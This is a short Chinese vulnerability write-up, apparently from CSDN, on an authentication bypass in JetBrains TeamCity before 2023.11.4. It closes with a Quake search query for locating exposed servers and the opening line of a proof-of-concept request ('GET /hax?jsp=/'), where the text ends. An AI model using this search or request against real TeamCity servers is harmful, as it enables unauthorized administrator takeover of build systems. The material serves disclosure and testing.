免责声明 由于传播、利用本CSDN所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行承担!
一、产品介绍
JetBrains TeamCity是一款由JetBrains开发的持续集成和持续交付(CI/CD)服务器。它提供了一个功能强大的平台,用于自动化构建、测试和部署软件项目。TeamCity旨在简化团队协作和软件交付流程,提高开发团队的效率和产品质量。
二、漏洞描述
JetBrains TeamCity在2023.11.4版本之前存在认证绕过漏洞,允许未经身份验证的攻击者通过创建新的管理员用户或生成新的管理员访问令牌,导致权限认证绕过。
三、漏洞危害
允许未经身份验证的攻击者通过创建新的管理员用户或生成新的管理员访问令牌,导致权限认证绕过。
四、影响范围
JetBrains TeamCity < 2023.11.4
五、漏洞复现
quake:title:"TeamCity"
验证漏洞POC:
GET /hax?jsp=/